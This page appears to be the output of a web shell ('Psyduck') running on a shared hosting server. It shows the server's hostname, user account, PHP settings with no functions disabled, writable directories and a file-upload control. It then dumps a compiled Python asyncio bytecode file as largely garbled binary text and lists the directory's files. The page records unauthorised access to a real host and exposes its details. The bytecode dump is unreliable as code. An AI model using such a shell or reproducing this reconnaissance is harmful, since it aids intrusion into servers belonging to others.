Psyduck - 可達鴨 之 鴨力山大2


Server : LiteSpeed
System : Linux premium217.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User : alloknri ( 880)
PHP Version : 8.1.34
Disable Function : NONE
Directory :  /opt/alt/python37/lib64/python3.7/asyncio/__pycache__/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //opt/alt/python37/lib64/python3.7/asyncio/__pycache__/futures.cpython-37.pyc
B

� f2�@s�dZdZddlZddlZddlZddlZddlmZddlm	Z	ddlm
Z
ejZejZej
Z
ejZejZejZejZejdZGdd	�d	�ZeZd
d�Zdd
�Zdd�Zdd�Zdd�Zdd�dd�ZyddlZWnek
r�YnXejZZdS)z.A Future class similar to the one in PEP 3148.)�CancelledError�TimeoutError�InvalidStateError�Future�wrap_future�isfuture�N�)�base_futures)�events)�format_helpersc@s�eZdZdZeZdZdZdZdZ	dZ
dZdd�dd�Ze
jZdd�Zd	d
�Zedd��Zejd
d��Zdd�Zdd�Zdd�Zdd�Zdd�Zdd�Zdd�Zdd�dd�Zdd �Zd!d"�Zd#d$�Zd%d&�Z e Z!dS)'ra,This class is *almost* compatible with concurrent.futures.Future.

    Differences:

    - This class is not thread-safe.

    - result() and exception() do not take a timeout argument and
      raise an exception when the future isn't done yet.

    - Callbacks registered with add_done_callback() are always called
      via the event loop's call_soon().

    - This class is not compatible with the wait() and as_completed()
      methods in the concurrent.futures package.

    (In Python 3.4 or later we may be able to unify the implementations.)
    NF)�loopcCs@|dkrt��|_n||_g|_|j��r<t�t�d��|_	dS)z�Initialize the future.

        The optional event_loop argument allows explicitly setting the event
        loop object used by the future. If it's not provided, the future uses
        the default event loop.
        Nr)
r
�get_event_loop�_loop�
_callbacksZ	get_debugr�
extract_stack�sys�	_getframe�_source_traceback)�selfr�r�4/opt/alt/python37/lib64/python3.7/asyncio/futures.py�__init__Gs
zFuture.__init__cCsd�|jjd�|����S)Nz<{} {}>� )�format�	__class__�__name__�join�
_repr_info)rrrr�__repr__Ys
zFuture.__repr__cCsF|js
dS|j}|jj�d�||d�}|jr6|j|d<|j�|�dS)Nz exception was never retrieved)�message�	exception�futureZsource_traceback)�_Future__log_traceback�
_exceptionrrrrZcall_exception_handler)r�exc�contextrrr�__del__]s
zFuture.__del__cCs|jS)N)r")rrrr�_log_tracebackmszFuture._log_tracebackcCst|�rtd��d|_dS)Nz'_log_traceback can only be set to FalseF)�bool�
ValueErrorr")r�valrrrr'qscCs|j}|dkrtd��|S)z-Return the event loop the Future is bound to.Nz!Future object is not initialized.)r�RuntimeError)rrrrr�get_loopwszFuture.get_loopcCs&d|_|jtkrdSt|_|��dS)z�Cancel the future and schedule callbacks.

        If the future is already done or cancelled, return False.  Otherwise,
        change the future's state to cancelled, schedule the callbacks and
        return True.
        FT)r"�_state�_PENDING�
_CANCELLED�_Future__schedule_callbacks)rrrr�cancel~s
z
Future.cancelcCsL|jdd�}|sdSg|jdd�<x"|D]\}}|jj|||d�q*WdS)z�Internal: Ask the event loop to call all callbacks.

        The callbacks are scheduled to be called as soon as possible. Also
        clears the callback list.
        N)r%)rr�	call_soon)rZ	callbacks�callback�ctxrrrZ__schedule_callbacks�szFuture.__schedule_callbackscCs
|jtkS)z(Return True if the future was cancelled.)r-r/)rrrr�	cancelled�szFuture.cancelledcCs
|jtkS)z�Return True if the future is done.

        Done means either that a result / exception are available, or that the
        future was cancelled.
        )r-r.)rrrr�done�szFuture.donecCs<|jtkrt�|jtkr td��d|_|jdk	r6|j�|jS)aReturn the result this future represents.

        If the future has been cancelled, raises CancelledError.  If the
        future's result isn't yet available, raises InvalidStateError.  If
        the future is done and has an exception set, this exception is raised.
        zResult is not ready.FN)r-r/r�	_FINISHEDrr"r#�_result)rrrr�result�s


z
Future.resultcCs,|jtkrt�|jtkr td��d|_|jS)a&Return the exception that was set on this future.

        The exception (or None if no exception was set) is returned only if
        the future is done.  If the future has been cancelled, raises
        CancelledError.  If the future isn't done yet, raises
        InvalidStateError.
        zException is not set.F)r-r/rr7rr"r#)rrrrr �s

zFuture.exception)r%cCsB|jtkr|jj|||d�n |dkr.t��}|j�||f�dS)z�Add a callback to be run when the future becomes done.

        The callback is called with a single argument - the future object. If
        the future is already done when this is called, the callback is
        scheduled with call_soon.
        )r%N)r-r.rr2�contextvarsZcopy_contextr�append)r�fnr%rrr�add_done_callback�s

zFuture.add_done_callbackcs<�fdd�|jD�}t|j�t|�}|r8||jdd�<|S)z}Remove all instances of a callback from the "call when done" list.

        Returns the number of callbacks removed.
        cs g|]\}}|�kr||f�qSrr)�.0�fr4)r<rr�
<listcomp>�sz/Future.remove_done_callback.<locals>.<listcomp>N)r�len)rr<Zfiltered_callbacksZ
removed_countr)r<r�remove_done_callback�s

zFuture.remove_done_callbackcCs4|jtkrtd�|j|���||_t|_|��dS)z�Mark the future done and set its result.

        If the future is already done when this method is called, raises
        InvalidStateError.
        z{}: {!r}N)r-r.rrr8r7r0)rr9rrr�
set_result�s

zFuture.set_resultcCs^|jtkrtd�|j|���t|t�r,|�}t|�tkr@td��||_t	|_|�
�d|_dS)z�Mark the future done and set an exception.

        If the future is already done when this method is called, raises
        InvalidStateError.
        z{}: {!r}zPStopIteration interacts badly with generators and cannot be raised into a FutureTN)r-r.rr�
isinstance�type�
StopIteration�	TypeErrorr#r7r0r")rr rrr�
set_exception�s

zFuture.set_exceptionccs,|��sd|_|V|��s$td��|��S)NTzawait wasn't used with future)r6�_asyncio_future_blockingr+r9)rrrr�	__await__szFuture.__await__)"r�
__module__�__qualname__�__doc__r.r-r8r#rrrIr"rr	Z_future_repr_inforrr&�propertyr'�setterr,r1r0r5r6r9r r=rBrCrHrJ�__iter__rrrrr s6rcCs,y
|j}Wntk
rYnX|�S|jS)N)r,�AttributeErrorr)�futr,rrr�	_get_loops
rScCs|��rdS|�|�dS)z?Helper setting the result only if the future was not cancelled.N)r5rC)rRr9rrr�_set_result_unless_cancelledsrTcCsZ|��st�|��r|��|��s(dS|��}|dk	rD|�|�n|��}|�|�dS)z8Copy state from a future to a concurrent.futures.Future.N)	r6�AssertionErrorr5r1Zset_running_or_notify_cancelr rHr9rC)�
concurrent�sourcer r9rrr�_set_concurrent_future_state&srXcCsh|��st�|��rdS|��r$t�|��r6|��n.|��}|dk	rR|�|�n|��}|�|�dS)zqInternal helper to copy state from another Future.

    The other Future may be a concurrent.futures.Future.
    N)r6rUr5r1r rHr9rC)rW�destr r9rrr�_copy_future_state5s
rZcs�t��st�tjj�std��t��s<t�tjj�s<td��t��rLt��nd�t��r`t��nd�dd�����fdd�}����fdd	�}��|���|�dS)
aChain two futures so that when one completes, so does the other.

    The result (or exception) of source will be copied to destination.
    If destination is cancelled, source gets cancelled too.
    Compatible with both asyncio.Future and concurrent.futures.Future.
    z(A future is required for source argumentz-A future is required for destination argumentNcSs"t|�rt||�n
t||�dS)N)rrZrX)r!�otherrrr�
_set_stateYsz!_chain_future.<locals>._set_statecs2|��r.�dks��kr"���n���j�dS)N)r5r1�call_soon_threadsafe)�destination)�	dest_looprW�source_looprr�_call_check_cancel_s
z)_chain_future.<locals>._call_check_cancelcsJ���r�dk	r���rdS�dks,��kr8��|�n����|�dS)N)r5Z	is_closedr])rW)r\r_r^r`rr�_call_set_statefsz&_chain_future.<locals>._call_set_state)rrDrV�futuresrrGrSr=)rWr^rarbr)r\r_r^rWr`r�
_chain_futureIs

	
rd)rcCsNt|�r|St|tjj�s(td|����|dkr8t��}|��}t	||�|S)z&Wrap concurrent.futures.Future object.z+concurrent.futures.Future is expected, got N)
rrDrVrcrrUr
r
Z
create_futurerd)r!rZ
new_futurerrrrss
r)rM�__all__Zconcurrent.futuresrVr:Zloggingr�r	r
rrrrrr.r/r7�DEBUGZSTACK_DEBUGrZ	_PyFuturerSrTrXrZrdrZ_asyncio�ImportErrorZ_CFuturerrrr�<module>s<
q*

Name
Size
Permissions
Options
__init__.cpython-37.opt-1.pyc
0.671 KB
-rw-r--r--
__init__.cpython-37.opt-2.pyc
0.616 KB
-rw-r--r--
__init__.cpython-37.pyc
0.671 KB
-rw-r--r--
base_events.cpython-37.opt-1.pyc
47.163 KB
-rw-r--r--
base_events.cpython-37.opt-2.pyc
38.447 KB
-rw-r--r--
base_events.cpython-37.pyc
47.384 KB
-rw-r--r--
base_futures.cpython-37.opt-1.pyc
2.05 KB
-rw-r--r--
base_futures.cpython-37.opt-2.pyc
1.714 KB
-rw-r--r--
base_futures.cpython-37.pyc
2.05 KB
-rw-r--r--
base_subprocess.cpython-37.opt-1.pyc
8.881 KB
-rw-r--r--
base_subprocess.cpython-37.opt-2.pyc
8.781 KB
-rw-r--r--
base_subprocess.cpython-37.pyc
8.973 KB
-rw-r--r--
base_tasks.cpython-37.opt-1.pyc
1.819 KB
-rw-r--r--
base_tasks.cpython-37.opt-2.pyc
1.819 KB
-rw-r--r--
base_tasks.cpython-37.pyc
1.819 KB
-rw-r--r--
constants.cpython-37.opt-1.pyc
0.574 KB
-rw-r--r--
constants.cpython-37.opt-2.pyc
0.574 KB
-rw-r--r--
constants.cpython-37.pyc
0.574 KB
-rw-r--r--
coroutines.cpython-37.opt-1.pyc
6.143 KB
-rw-r--r--
coroutines.cpython-37.opt-2.pyc
5.916 KB
-rw-r--r--
coroutines.cpython-37.pyc
6.226 KB
-rw-r--r--
events.cpython-37.opt-1.pyc
27.128 KB
-rw-r--r--
events.cpython-37.opt-2.pyc
18.081 KB
-rw-r--r--
events.cpython-37.pyc
27.233 KB
-rw-r--r--
format_helpers.cpython-37.opt-1.pyc
2.26 KB
-rw-r--r--
format_helpers.cpython-37.opt-2.pyc
2.021 KB
-rw-r--r--
format_helpers.cpython-37.pyc
2.26 KB
-rw-r--r--
futures.cpython-37.opt-1.pyc
10.39 KB
-rw-r--r--
futures.cpython-37.opt-2.pyc
7.152 KB
-rw-r--r--
futures.cpython-37.pyc
10.561 KB
-rw-r--r--
locks.cpython-37.opt-1.pyc
15.537 KB
-rw-r--r--
locks.cpython-37.opt-2.pyc
9.08 KB
-rw-r--r--
locks.cpython-37.pyc
15.537 KB
-rw-r--r--
log.cpython-37.opt-1.pyc
0.231 KB
-rw-r--r--
log.cpython-37.opt-2.pyc
0.193 KB
-rw-r--r--
log.cpython-37.pyc
0.231 KB
-rw-r--r--
proactor_events.cpython-37.opt-1.pyc
19.409 KB
-rw-r--r--
proactor_events.cpython-37.opt-2.pyc
19.019 KB
-rw-r--r--
proactor_events.cpython-37.pyc
19.614 KB
-rw-r--r--
protocols.cpython-37.opt-1.pyc
8.521 KB
-rw-r--r--
protocols.cpython-37.opt-2.pyc
3.118 KB
-rw-r--r--
protocols.cpython-37.pyc
8.521 KB
-rw-r--r--
queues.cpython-37.opt-1.pyc
7.979 KB
-rw-r--r--
queues.cpython-37.opt-2.pyc
5.346 KB
-rw-r--r--
queues.cpython-37.pyc
7.979 KB
-rw-r--r--
runners.cpython-37.opt-1.pyc
1.894 KB
-rw-r--r--
runners.cpython-37.opt-2.pyc
1.228 KB
-rw-r--r--
runners.cpython-37.pyc
1.894 KB
-rw-r--r--
selector_events.cpython-37.opt-1.pyc
27.724 KB
-rw-r--r--
selector_events.cpython-37.opt-2.pyc
26.114 KB
-rw-r--r--
selector_events.cpython-37.pyc
27.784 KB
-rw-r--r--
sslproto.cpython-37.opt-1.pyc
20.564 KB
-rw-r--r--
sslproto.cpython-37.opt-2.pyc
13.895 KB
-rw-r--r--
sslproto.cpython-37.pyc
20.758 KB
-rw-r--r--
streams.cpython-37.opt-1.pyc
19.541 KB
-rw-r--r--
streams.cpython-37.opt-2.pyc
13.449 KB
-rw-r--r--
streams.cpython-37.pyc
19.81 KB
-rw-r--r--
subprocess.cpython-37.opt-1.pyc
6.562 KB
-rw-r--r--
subprocess.cpython-37.opt-2.pyc
6.435 KB
-rw-r--r--
subprocess.cpython-37.pyc
6.591 KB
-rw-r--r--
tasks.cpython-37.opt-1.pyc
21.738 KB
-rw-r--r--
tasks.cpython-37.opt-2.pyc
14.681 KB
-rw-r--r--
tasks.cpython-37.pyc
21.793 KB
-rw-r--r--
transports.cpython-37.opt-1.pyc
11.893 KB
-rw-r--r--
transports.cpython-37.opt-2.pyc
6.364 KB
-rw-r--r--
transports.cpython-37.pyc
11.922 KB
-rw-r--r--
unix_events.cpython-37.opt-1.pyc
31.249 KB
-rw-r--r--
unix_events.cpython-37.opt-2.pyc
27.637 KB
-rw-r--r--
unix_events.cpython-37.pyc
31.586 KB
-rw-r--r--
windows_events.cpython-37.opt-1.pyc
22.524 KB
-rw-r--r--
windows_events.cpython-37.opt-2.pyc
21.44 KB
-rw-r--r--
windows_events.cpython-37.pyc
22.524 KB
-rw-r--r--
windows_utils.cpython-37.opt-1.pyc
4.213 KB
-rw-r--r--
windows_utils.cpython-37.opt-2.pyc
3.789 KB
-rw-r--r--
windows_utils.cpython-37.pyc
4.295 KB
-rw-r--r--